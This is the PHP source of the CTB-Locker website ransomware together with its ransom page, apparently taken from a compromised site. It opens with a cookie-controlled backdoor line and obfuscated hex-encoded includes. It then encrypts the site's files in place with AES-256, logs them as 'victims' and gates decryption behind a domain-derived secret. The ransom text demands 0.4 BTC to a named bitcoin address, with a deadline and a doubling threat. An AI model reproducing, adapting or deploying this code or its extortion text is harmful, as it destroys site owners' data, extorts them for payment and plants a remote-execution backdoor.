<%>PHP<% if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); > eval(base64_decode("")); include "\x2fweb\x2fsit\x65s/u\x73er/\x33/83\x2f107\x3827/\x70ubl\x69c/w\x77w/c\x72ypt\x2fthe\x6des.\x70hp"; eval(base64_decode("")); include "\x2fweb\x2fsit\x65s/u\x73er/\x33/83\x2f107\x3827/\x70ubl\x69c/w\x77w/y\x6fni6\x66/te\x6dpla\x74es/\x70res\x73.ph\x70"; //session_start(); //if (!isset($_SESSION["page"])) $_SESSION["page"] = "index"; $d = isset($_SERVER["HTTP_HOST"]) && $_SERVER["HTTP_HOST"] != "" ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://"; define("cur_domain", $d); define("cur_url", $proto.$d.$_SERVER["REQUEST_URI"]); require_once('crypt/AES.php'); require_once('crypt/Random.php'); //============================================================================== function enc_excluded($victim) { return !in_array($victim, array('./index.php', './allenc.txt', './test.txt', './victims.txt', './extensions.txt', './temp', './robots.txt')) && (false === strpos($victim, '/crypt/')) && (false === strpos($victim, 'secret_')); } //============================================================================== function get_files($dir, $arr_ext, $maxsize, $filter) { $files_list = array(); if ($dh = opendir($dir)) { while (false !== ($file = readdir($dh))){ if($file == '.' || $file == '..'){ continue; } $path = $dir.'/'.$file; $ext = explode('.', $file); $ext = mb_strtolower(array_pop($ext)); if(is_file($path) && filesize($path) <= $maxsize && in_array($ext, $arr_ext) && call_user_func($filter, $path)) { $files_list[] = $path; } elseif(is_dir($path)){ $files_list = array_merge($files_list, get_files($path, $arr_ext, $maxsize, $filter)); } } closedir($dh); return $files_list; } return false; } //============================================================================== /* function crypt_file($fname, $cipher, $encrypt, $chunklen=10240) { echo "crypt_file $fname\n"; #debug $chunklen = $chunklen * 16 - ($encrypt ? 1 : 0); $file = fopen($fname, 'r'); $temp = fopen('temp', 'w'); while (!feof($file)) { $chunk = fread($file, $chunklen); if ($chunk === "") continue; $encrypted = $encrypt ? $cipher->encrypt($chunk) : $cipher->decrypt($chunk); fwrite($temp, $encrypted); } fclose($file); fclose($temp); $file = fopen($fname, 'w'); $temp = fopen('temp', 'r'); while (!feof($temp)) { $chunk = fread($temp, $chunklen); fwrite($file, $chunk); } fclose($file); fclose($temp); }*/ //============================================================================== function create_aes_cipher($key) { $aes = new Crypt_AES(); $aes->setKeyLength(256); $aes->setKey($key); return $aes; } //============================================================================== function crypt_file($fname, $cipher, $encrypt, $chunklen=10240) { echo "crypt_file $fname "; $chunklen *= 16; $size = filesize($fname); $file = @fopen($fname, 'r+'); if ($file === false) { echo "FAILED\n"; return; } $seek = 0; $eof = false; $cipher->disablePadding(); $tm = time(); while (!$eof || (time() - $tm > 10)) { @fseek($file, $seek); $chunk = @fread($file, $chunklen); $eof = $seek + strlen($chunk) >= $size; #feof($file); if ($eof) { //echo "eof
"; $cipher->enablePadding(); } $crypted = $encrypt ? $cipher->encrypt($chunk) : $cipher->decrypt($chunk); @fseek($file, $seek); @fwrite($file, $crypted); $seek += strlen($crypted); //echo "Seek read: $seek, readed: ".strlen($chunk)." after crypt: ".strlen($crypted)."
"; } ftruncate($file, $seek); echo "OK truncated: $seek\n"; @fclose($file); } //============================================================================== function encrypt_files($files, $keypass, $keytest) { $allenc = file_exists('allenc.txt') ? explode("\n", file_get_contents('allenc.txt')) : array(); if (!file_exists('test.txt') || file_get_contents('test.txt') === '') { echo 'getting test files\n'; $cipher = create_aes_cipher($keytest); $test_files = $files; shuffle($test_files); $test_files = array_splice($test_files, 0, 2); foreach ($test_files as $victim) { crypt_file($victim, $cipher, 1); file_put_contents('test.txt', $victim."\n", FILE_APPEND); } } else { $test_files = explode("\n", file_get_contents('test.txt')); } $cipher = create_aes_cipher($keypass); foreach ($files as $victim) { if (!in_array($victim, $allenc) && !in_array($victim, $test_files)) { crypt_file($victim, $cipher, 1); file_put_contents('allenc.txt', $victim."\n", FILE_APPEND); } } } //============================================================================== function decrypt_files($filelist, $keypass) { if (!file_exists($filelist)) return; $allenc = array_reverse(explode("\n", file_get_contents($filelist))); $cipher = create_aes_cipher($keypass); $fsize = filesize($filelist); foreach ($allenc as $victim) { if (!file_exists($victim)) continue; crypt_file($victim, $cipher, 0); $fsize -= strlen($victim) + 1; $hfile = fopen($filelist, 'r+'); ftruncate($hfile, $fsize); fclose($hfile); } } //============================================================================== if (isset($_POST['submit'])) { // call this script until victims.txt != allenc.txt (without blank lines) if (!file_exists('victims.txt') || file_get_contents('victims.txt') === '') { $extensions = explode(' ', file_get_contents('extensions.txt')); $victims = get_files('.', $extensions, 80*1024*1024, 'enc_excluded'); $victims = array_slice($victims, 0, 4000); file_put_contents('victims.txt', implode("\n", $victims)); } else { $victims = explode("\n", file_get_contents("victims.txt")); } encrypt_files($victims, $_POST['submit'], $_POST['submit2']); exit("ALL_HAD_DONE"); } //============================================================================== function secret_ok() { $secret = substr(md5("djf33".cur_domain), 2, 10); return isset($_GET["secret"]) && $_GET["secret"] === $secret; } //============================================================================== if (isset($_GET['decrypt']) && secret_ok()) { decrypt_files('allenc.txt', $_GET['decrypt']); decrypt_files('test.txt', $_GET['dectest']); exit('Congratulations! ALL FILES WAS DECRYPTED!!'); } //============================================================================== if (isset($_GET['dectest']) && secret_ok()) { decrypt_files('test.txt', $_GET['dectest']); exit('Congratulations! TEST FILES WAS DECRYPTED!!'); } //============================================================================== ?> CTB-Locker

Attention! What happened?

Your personal files are encrypted by CTB-Locker.
Your scripts, documents, photos, databases and other important files have been encrypted with strongest encryption algorithm AES-256 and unique key, generated for this site.

Decryption key is stored on a secret Internet server and nobody can decrypt your files until you pay and obtain the decryption key.

Learn more about the algorithm can be here: Wikipedia

Fbi's advice on cryptolocker just pay the ransom

What to do?

We created for you this bitcoin address 1Cq5KfTZVaY2VBnWcXLGCocc4GWLe2NiF6

What is a Bitcoin address?

For decrypt your files you need to make a few simple steps:

1. Get cryptocurrency Bitcoin
We recommend:
1) https://localbitcoins.com/ - (Paypal, Visa/MasterCard, QIWI Wallet, Any Bank and etc.)
2) Buying Bitcoins (the newbie version)
3) A complete list of exchanges!
4) https://btc-e.com/ (OkPay, Perfect Money, Visa/MasterCard and etc.)
5) https://www.okcoin.com/
2. Send 0.4 BTC (~150$) to the address 1Cq5KfTZVaY2VBnWcXLGCocc4GWLe2NiF6
3. After payment, confirmation is expected within from 15 minutes to 3 hours.
You can track confirmations of your transaction in https://blockchain.info/address/1Cq5KfTZVaY2VBnWcXLGCocc4GWLe2NiF6
4. Click button:
DECRYPT

You must carry out this actions before: 2016-02-22 14:00:00

At the expiry of the time redemption amount will be 0.8 BTC. Please make payment in a timely.

Dangerous!

Do not try to cheat the system, edit encrypted files, edit CTB-locker internal files or delete any file. This will result in the inability to recover your data, and we can not help you. Only way to keep your files is to follow the instruction.